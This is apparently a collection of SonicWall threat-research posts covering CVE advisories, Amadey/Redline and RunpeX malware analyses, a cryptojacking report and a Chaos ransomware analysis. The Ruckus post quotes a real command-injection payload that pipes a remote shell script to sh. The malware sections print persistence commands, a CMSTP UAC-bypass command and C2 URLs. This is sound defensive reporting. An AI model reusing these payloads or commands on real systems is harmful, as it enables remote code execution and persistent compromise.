Posts

Redis Heap Buffer Overflow Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Redis stands as an in-memory, high-performance key-value data store that is both lightweight and non-volatile. Designed to offer quick access to simple yet mutable data structures, it utilizes the Redis Serialization Protocol (RESP) – a protocol built atop the Transmission Control Protocol (TCP). Similar to many modern databases, Redis operates on a client-server model. Through this model, clients can seamlessly create, modify, and fetch records stored on the Redis server using a variety of specialized Redis commands.

  A heap-based buffer overflow vulnerability has been reported in Redis. The vulnerability is due to improper validation of user input when extracting keys from a command.

  An external attacker, leveraging this vulnerability, could potentially send maliciously crafted requests to the designated server. Should they succeed in their exploitation, it might lead to a denial-of-service state, incapacitating the server. In more severe situations, it could even grant the attacker the capability to execute arbitrary code within the safety confines of the Redis operational process.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-36824.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.5 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is high.
    • Privileges required is low.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  A vulnerability exists due to a flaw in the logic of the getKeysUsingKeySpecs() function when it processes commands with multiple key specifications. Specifically, while computing the count of matching keys and invoking the getKeysPrepareResult() function, it doesn’t consider keys identified by previous key specifications. As a result, the keyReference array, indicated by keys, may be inadequately sized, leading to potential overflow when assignments are made to keys[k].

  If the count is less than or equal to MAX_KEYS_BUFFER, the function getKeysPrepareResult() directs result->keys to the address of result->keysbuf, which can lead to a stack buffer overflow. Conversely, if the count exceeds MAX_KEYS_BUFFER, result->keys is directed to the address of the allocated heap buffer, risking a heap buffer overflow.

  To exploit this vulnerability, attackers can send a COMMAND GETKEYS or COMMAND GETKEYSANDFLAGS command, followed by a specially crafted command containing 257 or more keys within its arguments. If attackers possess credentials with key pattern permissions, they can also trigger the vulnerability by sending the crafted command on its own.

  For instance, the following command can activate the vulnerability:
  

  Several Redis commands with multiple key specifications can be exploited in this manner. They share a common pattern: they contain exactly two key specifications, where the first identifies a singular key and the second identifies a variable number of keys. The commands vulnerable to this pattern include:
  

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the vulnerable software.
  • The attacker must have valid credentials on the target server.
  • The attacker credentials must be configured with key pattern permissions (ACL attack vector only).

Triggering Conditions:

  The attacker begins by authenticating to the target server. Once authenticated, there are two potential attack vectors they might exploit. The first involves sending either a “COMMAND GETKEYS” or “COMMAND GETKEYSANDFLAGS” command. This is immediately followed by a specifically crafted command containing 257 or more keys, which is termed as the “GETKEYS attack vector.” The second method, known as the “ACL attack vector,” simply requires the attacker to send a command, again followed by a crafted command with 257 or more keys.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • RESP
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 4016 Redis GETKEYS Heap Buffer Overflow 1

  • IPS: 4017 Redis GETKEYS Heap Buffer Overflow 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Amadey & Redline Are Still Going Strong

This week, the SonicWall Capture Labs Threat Research Team has observed the following threat:

The Amadey botnet malware has been packaged with a Redline infostealer to infiltrate systems, extract a variety information, and enable control via a C2 server. Both of these malware families are Russian in origin and can be found on darknet markets, with purchase prices between $100-500 USD. These malware samples acting in tandem could compromise user accounts and passwords for the infected system as well as online accounts, cryptocurrency wallets, and other sensitive information.

Static Analysis

Identifying the parent file (6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf) using Detect It Easy shows that it is an cabinet installer (Figure 1) and does not give any indication of packers or encryption.

Figure 1: Initial sample detection

Unpacking the parent archive gives five separate files:

  • 9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (32bit .NET DLL)
  • c7eefb8ad88563225d2f6dbf8c172b8f9c762d4568165e7dda0cf5fe99d37bad (32bit .NET EXE)
  • 3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (32bit EXE)
  • 73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (32bit .NET EXE)
  • 59e62d21e9db964ff3d98c7b8be190584754c87d1bbde2dea80c7e9b27b14ed0 (32bit EXE)

Of these files, there are two that automatically have suspicious characteristics: c7e and 73b are both timestomped, showing a creation timestamp in the future (Figure 2). 73b is also identified as having Confuser Ex obfuscation (Figure 3), which hinders analysis to a high degree.

Figure 2: Timestamps showing file creation in the year 2090

Figure 3: A creation date of 2067; Confuser Ex is an open-source protection software for .NET software

Looking through strings, file 316 has a reference to an Amadey.pdb file (Figure 4) within the debug strings; this is a custom debug file that loads symbols (resources or filepaths) as an alternative what may be in the finished program. The API calls that are listed show capabilities in Figure 5 cover the following areas: networking, system enumeration (to include registry, accounts, files, programs, and running processes), process injection, data manipulation, and security. The accompanying files also assist in network connections and enumeration with the exception of 9a6; this is a small .DLL file (~2kb) that is used for process side-loading.

Figure 4: String reference to Amadey

Figure 5: API calls within Amadey that confirm some of the malware functionality

Amadey has multiple methods of evasion for both runtime and analysis. This includes but is not limited to: sleeping for long periods, virtual machine and debugger detection (IsDebuggerPresent, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcess), and obfuscation. Removing ConfuserEx from the Redline sample shows the capabilities of what the file is doing. The file is named ‘Doggeries.exe’, and has a large number of functions for both parsing data and communication, as seen below in Figure 6.


Figure 6: Redline deobfuscated, showing a method of communication via email

Dynamic Analysis

Running the main application, files are dropped into the following locations and automatically renamed:

  • “~\Desktop\v5f6rvVc7A.exe”
  • “~\AppData\Local\Temp\IXP000.TMP\”
    • j3346492.exe
    • x3075787.exe
  • “~\AppData\Local\Temp\IXP001.TMP\”
      • i8210436.exe
    • x0248748.exe
  • “~\AppData\Local\Temp\IXP002.TMP\”
    • h8899948.exe
    • g3601528.exe
  • “~\AppData\Local\Temp\925e7e99c5\”
    • pdates.exe
  • “~\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll”

Once the files are dropped, persistence is created during the following steps:

  • ‘schtasks.exe’ is run by ‘pdates.exe’ with the following command, which will run ‘pdates.exe’ once every minute:

‘”System32\schtasks[.]exe” //Create //SC MINUTE //MO 1 //TN pdates[.]exe /TR “~\925e7e99c5\pdates[.]exe” /F’

  • ‘cacls’ (Windows Access Control List) is used to set permissions on both the file and the directory to prevent runtime issues:

‘”System32\cmd[.]exe” /k echo Y|CACLS “pdates[.]exe” /P “user:N” (&&) CACLS “pdates[.]exe” /P “user:R” /E (&&) echo Y|CACLS “..\925e7e99c5” /P “user:N” (&&) CACLS “..\925e7e99c5” /P “user:R” /E (&&) Exit’

  • A Windows registry key is changed to the following value to autostart when the system boots:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders: ~\AppData\Local\Temp\925e7e99c5\

As this is occurring, another file is run named ‘Healer.exe’ (it will have a randomized name when dropped). The only function ‘Healer’ has is to disable Windows Defender and prevent it from updating, as seen below in Figure 7.

Figure 7: Healer’s functions and targeted registry keys

After ‘Healer’ has been run, ‘pdates.exe’ will reach out to the C2 and download ‘clip64.dll’ (Figure 8).

Figure 8: Communication is established, followed by ‘clip64.dll’ downloading

Clip64 is used to pull data from the clipboard and package it to be sent back to the C2. There is also a reference to Amadey in a .pdb path within the file (Figure 9).


Figure 9: Amadey Clipperdll.pdb reference (left), and clip64.dll capabilities (right)

An additional module named ‘cred64.dll’ also attempts to download, but is unsuccessful (Figure 10). It is unknown whether this is deliberate or accidental on the botnet operator’s part.

Figure 10: The file ‘cred64.dll’ failed to download to the target system

A hook is installed using DirectDrawCreateEx to capture user input and activity. Amadey and Redline will enumerate the system in its entirety to collect hardware specifications, OS version, user accounts, installed software, credentials (in- and out of browser), documents, and cryptocurrency wallet information (Figure 11).

Figure 11: C2 and cryptocurrency information

Amadey and Redline are detected by RTDMS and the signature Amadey.R(Trojan).

IOCs

Hashes
6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf (parent file)
9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (exhalhENZZbhvzCCmysGrfFiklOcA.dll)
c7eefb8ad88563225d2f6dbf8c172b8f9c762d4568165e7dda0cf5fe99d37bad
3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (Amadey payload)
73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (Redline payload)
59e62d21e9db964ff3d98c7b8be190584754c87d1bbde2dea80c7e9b27b14ed0
2244b4dc9afc6cfab7ef1dea92420e2acd275bac7349b929a69f3c1ae25f5e2f (pdate.exe)
58b02c8b4bc2bf7f5f1e8e45d7c206956f188ae56b648922ca75987b999db503 (clip64.dll)

URLs
77.91.68[.]61/rock/index.php
77.91.68[.]61/Plugins/cred64.dll
77.91.68[.]61/Plugins/clip64.dll
77.91.68[.]61/new/foto4060.exe
77.91.68[.]61/smo/du.exe

Ruckus Wireless Remote Code Execution Vulnerability

RUCKUS Networks designs, sells and services IT networking products, such as switches, WLAN controllers, Access points, IoT gateways and software. RUCKUS started as wireless only company selling to Internet Service Providers(ISP), Hotel chains, large public venues and later extended to education.

RUCKUS Wireless Admin Remote Code Execution Vulnerability | CVE-2023-25717
RUCKUS Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Following is a exploit in the wild.

Let’s break down what the attacker is trying to do.

  • login_username=admin: This parameter sets the username to “admin” for the login attempt.
  • password=admin$(curl%20http:// 5.181.80.102/ruckus.sh%20|%20sh: This parameter sets the password for the login attempt. This part of the code is particularly interesting because it includes a command injection attempt.
  • $(curl%20http:// 5.181.80.102/ruckus.sh%20|%20sh
    This part is attempting a command injection by using the $() syntax to execute a command within the password field. The command being executed is:
  • curl http://5.181.80.102/ruckus.sh | sh
    This command is retrieving a shell script (ruckus.sh) from a remote server (at IP address 5.181.80.102) and piping its contents to the sh command, which would effectively run the script’s commands.
    In summary, if this code is successfully executed within the context of a vulnerable system that allows command injection, it could potentially retrieve and execute a shell script from the specified remote server. This can lead to unauthorized access, data breaches, and other malicious actions.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15864:Ruckus Wireless Admin RCE

RUCKUS has patched this vulnerability.
Threat Graph

Cryptojacking Continues Crushing Records

In the early 2020s, ransomware raced upward quarter after quarter, with seemingly no end in sight. But its rush to ascendence was so rapid that it caught the attention of law enforcement, governments and cybersecurity staff, who began working overtime to raise awareness and prevent attacks, and to more quickly catch attackers and bring them to justice when they did occur.

When high-profile cybercriminal arrests occur, it’s often said that one bust is unlikely to move the needle when it comes to cybercrime. But what about dozens? We’re halfway into 2023, and it looks like out of these busts, general network hardening and a growing emphasis on resiliency, something seems to be having an effect.

According to exclusive threat data published in the 2023 SonicWall Cyber Threat Report Mid-Year Update, ransomware fell a staggering 41% in the six months between New Year’s Day and the 30th of June, with every region seeing a decline. Combined with 2022 data, which shows volume falling in every quarter save Q4, lower ransomware volumes have gone from being an anomaly or part of the background ebb-and-flow to bona fide trend. But why?

We’re All Just Looking for Security. (Even Cybercriminals.)

It’s already becoming harder to believe, but there was a time when cybercriminals aspired to be household names. Ransomware groups attempted to trade on their reputation to more reliably collect huge sums of money, but in the age of greater scrutiny, notoriety has become a liability.

To be clear, ransomware isn’t going away—threat trends are cyclical, and despite being despicable, crime still pays. But based on our data, cybercriminals in 2023 seem to be favoring a much greater degree of subtlety, slinking back into the shadows to conduct their craft in secret. When the question changes from “How can we make the most money possible” to “How can we best make money without getting caught,” the answer changes, too—and so far this year, that answer has been encrypted threats, IoT malware and cryptojacking.

Attacks over HTTPs rose 22% in the first half of 2023, enough to give SonicWall the highest year to date volume of any year since SonicWall began tracking this threat type. And IoT malware jumped to 77.9 million, up 37% over this time in 2022 and higher than any other six-month period on record. But it was cryptojacking that saw the most growth.

Cryptojacking’s Climb Accelerates

Until 2022, cryptojacking hits had never surpassed the 100 million mark during any year. But the full-year total for 2022 reached 139.3 million, a record high.

In 2023, cryptojacking had surpassed even that high water mark by early April … and then continued to grow. In all, cryptojacking volume in the first half of 2023 reached 332.3 million, an increase of 399% year-to-date.

Four months out of six set new monthly volume records, and the amount of cryptojacking seen in May 2023—77.6 million hits—eclipsed the full year totals recorded in 2018 and 2019, and easily surpassed total mid-year volume for 2020, 2021 and 2022.

Who’s Being Targeted?

In short, everyone: Every region saw an increase in cryptojacking compared with the first half of 2022. With the exception of Asia, which saw just 1% more cryptojacking year-to-date, these spikes were substantial. Latin America recorded 32% more cryptojacking than in the first half of 2022, but even this was small compared with the 345% increase observed in North America. Worse, Europe saw a staggering 788% spike.

A country-by-country look also shows massive increases. The U.S. saw 340% more cryptojacking hits than in the first six months of 2022. And in Europe, Germany and the U.K. recorded increases of 139% and 479% respectively. India provided a rare counterexample—cryptojacking hits there actually fell 73% year to date.

Cryptojacking by Industry

Unfortunately, a look at cryptojacking by industry shows no such bright spots. In all the industries we studied in depth, cryptojacking was up—and not just a little bit.

To be clear, cryptojacking numbers were quite small leading up to 2023—and any time you’re dealing with fairly small numbers growing very quickly, percentage increases become a less useful way to look at this change than factor increases.

In the first six months of 2023, the number of cryptojacking hits on retail customers more than doubled, with the average percentage of customers targeted each month rising from .06% to .3%.

Finance customers saw 4.7 times the number of cryptojacking hits, with percentage targeted on a monthly basis increasing from .05% to .36%.

Those working in healthcare recorded 69 times the number of hits than in the first half of 2022, with the percentage of customers targeted spiking from .06% to .32%.

Our government customers were targeted by 89 times the amount of cryptojacking compared with this time last year—with average percentage of customers seeing an attack each month jumping from .17% to .37%.

But education customers recorded the biggest increase: Cryptojacking on education customers skyrocketed to a staggering 320 times the number of attacks recorded in the first half of 2022, with the percentage of customers being targeted monthly averaging .19% last year and .55% this year.

Where Will Cryptojacking Go from Here?

While any prediction is an imprecise science, based on historical data alone, we can expect cryptojacking to continue to rise as 2023 wears on. But even if it doesn’t, cryptojacking volumes for 2023 still stand an excellent chance of surpassing the combined volumes of every year before it, all the way back to 2018 when SonicWall began tracking this threat type.

Regardless of what happens, SonicWall will continue to closely monitor cryptojacking levels—and with the threat of cryptojacking on the rise, expect expanded coverage of this attack type when our next Cyber Threat Report is released at the beginning of 2024.

Until then, you can learn more about cryptojacking, ransomware and other threats—along with which locations and industries are being targeted—in the Mid-Year Update to the 2023 SonicWall Cyber Threat Report.

RunpeX Abuses Legitimate AntiMalware Driver

SonicWall Capture Labs Research team has observed RunpeX is abusing vulnerable version of kernel driver belonging to Zemana AntiMalware. RunpeX is a protector and malware injector based on KoiVM .NET protector. RunpeX is widely used to deliver different malware families like Remcos, Formbook, AgentTesla, Redline, Vidar, etc. The legitimate driver dropped by RunpeX is used to kill/disable AV/EDR processes which are generally protected. This technique is also known as Bring Your Own Vulnerable Driver (BYOVD). Previously, this technique has been employed by APT groups, AV/EDR killer tools, and ransomware actors.

Layer 1:

First-stage loader is .net application, which contains encrypted second stage payload hardcoded in byte array. This byte array is decrypted and executed using Assembly.Load() method.

Figure 1: Byte array contains encrypted second-stage loader and InvokeMethod() function 

 

Before executing second stage payload, function named “Do()” is called to bypass AMSI detection by patching AmsiScanBuffer() function.   

Figure 2: Function to bypass AMSI  

Layer 2:

Second-stage loader is .net RunpeX, which is protected with customized KoiVM virtualizer. This payload is responsible for installing Zemana AntiMalware driver.

Figure 3: Decompiled code of second-stage payload

 

In order to disable security solutions, this second stage payload drops and install Zemana driver. The driver is dropped at the root of “c” drive with name “Zemana.sys” and is signed by “Zemana Ltd.”

Figure 4: Driver is signed by “Zemana Ltd”

 

To install driver on system, RunpeX elevate privileges using CMSTP UAC bypass technique. Below command is executed to achieve privilege escalation:

  • “c:\windows\system32\cmstp.exe /au C:\windows\temp\1brdhu0p.inf”

Figure 5: Privilege escalation and UAC bypass using cmstp.exe

 

The INF file used in this UAC bypass is similar to the file present on GitHub.

Figure 6: Content of inf file

 

In the next step, driver service is created with name “Zemana” to load driver.

Figure 7: Service named “Zemana” is created to load driver

 

Then it retrieves handle to the loaded driver using CreateFileA() function:

Figure 8: Code snippet to retrieve driver handle

 

Using the handle created in the above step, RunpeX sends IOCTL code 0x80002010 to register itself as a trusted process by the driver.

Figure 9: IOCTL used to add process in trusted list

 

Finally, RunpeX sends another IOCTL code 0x80002048 to terminate target process by passing process PID as parameter. Using this IOCTL, it terminates all processes which are present in the configuration list.

Figure 10: IOCTL used to terminate security software processes

 

Driver IOCTL functionality

Below figure shows IOCTL handler functions that are part of installed driver:

Figure 11: Driver function to handle IOCTLs

Indicators Of Compromise (IOCs):

  • 2d3c9078e40a6dd286b36dbaaf1f0a367d22a0f9e30a2fc93d1d8ba5b9b97ce8 – Initial Payload (.Net Application)

SonicWall Capture Labs provides protection against this threat via the following signature:

  • Injector.RPX (Trojan)

Microsoft Security Bulletin Coverage for August 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-35359 Windows Kernel Elevation of Privilege Vulnerability
ASPY 467: Exploit-exe exe.MP_334

CVE-2023-35380 Windows Kernel Elevation of Privilege Vulnerability
ASPY 465: Exploit-exe exe.MP_332

CVE-2023-35382 Windows Kernel Elevation of Privilege Vulnerability
ASPY 466: Exploit-exe exe.MP_333

CVE-2023-35384 Windows HTML Platforms Security Feature Bypass Vulnerability
IPS 15908: Windows HTML Platforms Security Feature Bypass (CVE-2023-35384)

CVE-2023-35386 Windows Kernel Elevation of Privilege Vulnerability
ASPY 469: Exploit-exe exe.MP_336

CVE-2023-36900 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 470: Exploit-exe exe.MP_337

The following vulnerabilities do not have exploits in the wild :
CVE-2023-21709 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29328 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29330 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35368 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35371 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35372 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35376 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35377 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35378 Windows Projected File System Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35379 Reliability Analysis Metrics Calculation Engine (RACEng) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35381 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35383 Microsoft Message Queuing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35385 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35387 Windows Bluetooth A2DP driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35388 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35389 Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35390 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35391 ASP.NET Core SignalR and Visual Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35393 Azure Apache Hive Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-35394 Azure HDInsight Jupyter Notebook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36865 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36866 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36869 Azure DevOps Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36873 .NET Framework Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36876 Reliability Analysis Metrics Calculation (RacTask) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36877 Azure Apache Oozie Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36881 Azure Apache Ambari Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36882 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36889 Windows Group Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-36890 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36891 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36892 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36893 Microsoft Outlook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36894 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36895 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36896 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36897 Visual Studio Tools for Office Runtime Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-36898 Tablet Windows User Interface Application Core Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36899 ASP.NET Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36903 Windows System Assessment Tool Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36904 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-36905 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36906 Windows Cryptographic Services Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36907 Windows Cryptographic Services Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36908 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36909 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-36910 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36911 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36912 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-36913 Microsoft Message Queuing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36914 Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-38154 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38167 Microsoft Dynamics Business Central Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38169 Microsoft OLE DB Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38170 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38172 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-38175 Microsoft Windows Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38176 Azure Arc-Enabled Servers Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38178 .NET Core and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-38180 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-38181 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-38182 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38184 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38185 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-38186 Windows Mobile Device Management Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-38188 Azure Apache Hadoop Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-38254 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.

Netgear ProSAFE NMS300 SQLi Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The Netgear ProSAFE Network Management System (NMS300) is a centralized and comprehensive management application designed for network administrators. It enables them to discover, monitor, configure, and report on SNMP-based enterprise-class network devices. The Netgear Network Management System NMS300 provides insights into network elements, including third-party devices, and its web-based user interface simplifies the process of monitoring and administering an entire network.

  An SQL injection vulnerability has been reported in Netgear ProSafe NMS300. This vulnerability arises due to improper input validation in the getNodesByTopologyMapSearch component.

  A remote, authenticated attacker could exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation of this vulnerability could result in SQL injection or, in the worst-case scenario, remote code execution in the context of the SYSTEM user.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-38099.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  When a user navigates to the device list through the topology map search feature, an HTTP GET request is dispatched to the Request-URI “/topology.do?method=getDeviceListByDim”. Upon receipt of this request, the function TopologyMapController.getDeviceByDim() is invoked. This function displays the values of all devices identified in the preceding search request. Multiple parameter values are saved into different variables, with the ‘exclude’ parameter being of particular relevance to this vulnerability. The value for the ‘exclude’ parameter is stored in the ‘exclude’ variable.

  Following this, the NodeInfoDao.getNodesTopologyMapSearch() method is invoked, passing the ‘exclude’ variable’s value into the ‘equips’ variable. This function is responsible for constructing and running the SQL query needed to fetch the specified device list. The corresponding SQL query is stored as a string in the ‘sql’ variable:
  
  If the ‘equips’ variable’s value is not empty, the string ” and nodeId not in (equips) ” is appended to the ‘sql’ variable’s value (where equips is replaced by the ‘equips’ variable’s value). The SQL query contained in the ‘sql’ variable is then executed, and the result of the query is returned.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the vulnerable software.
  • The attacker must have permission to view the device list via the Topology map search component.

Triggering Conditions:

  The vulnerability is triggered when the HTTP request is received that includes an embedded SQL injection which will get triggered when the request is processed.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
  What a successful GET Request might look like:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 4001 NETGEAR ProSAFE NMS300 SQL Injection

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

A new variant from Chaos Ransomware family surfaces

The SonicWall Capture Labs Research team has received a sample of a new variant from Chaos Ransomware family which is a customizable ransomware builder that emerged in underground forums, by falsely marketing itself as the .NET version of Ryuk.

It provided the following customizable options which a cybercriminal can use to customize a ransomware.

  • processName = “svchost.exe”;
  • sleepTextbox = 10;
  • spreadName = “surprise.exe”;
  • userDir = “C:\\Users\\”;
  • checkAdminPrivilage = true;
  • checkCopyRoaming = true;
  • checkdeleteBackupCatalog = true;
  • checkdeleteShadowCopies = true;
  • checkdisableRecoveryMode = true;
  • checkSleep = false;
  • checkSpread = true;
  • checkStartupFolder = true;
  • droppedMessageTextbox = “read_it.txt”;
  • encryptedFileExtension = “”;
  • encryptionAesRsa = true;
  • messages = new string[]; #Ransomware message content

Infection Cycle:

At the start of the execution it checks its own filename and the location from where it is running.

If the process name and the location name is not %appdata%\\svchost.exe, it drops a copy of itself to %appdata%\\svchost.exe and launches it.

After that it checks for the “checkSleep” variable which is provided at the time of building ransomware, if the value is False is will skip executing the sleepOutOfTempFolder(), function which also checks the folder location form where it is running and if the path does not matches, it uses another count variable “sleepTextbox” whose value is multiplied by 1000 times and resulting value is passed to thread and sleeps for that many milliseconds.

It then checks for the checkStartupFolder flag and if its true it calls addLinkToStartup() function.

It creates a file svchost.url in which it adds the location of the file and copy the file into User Startup folder to
enable its automatic execution at every system startup

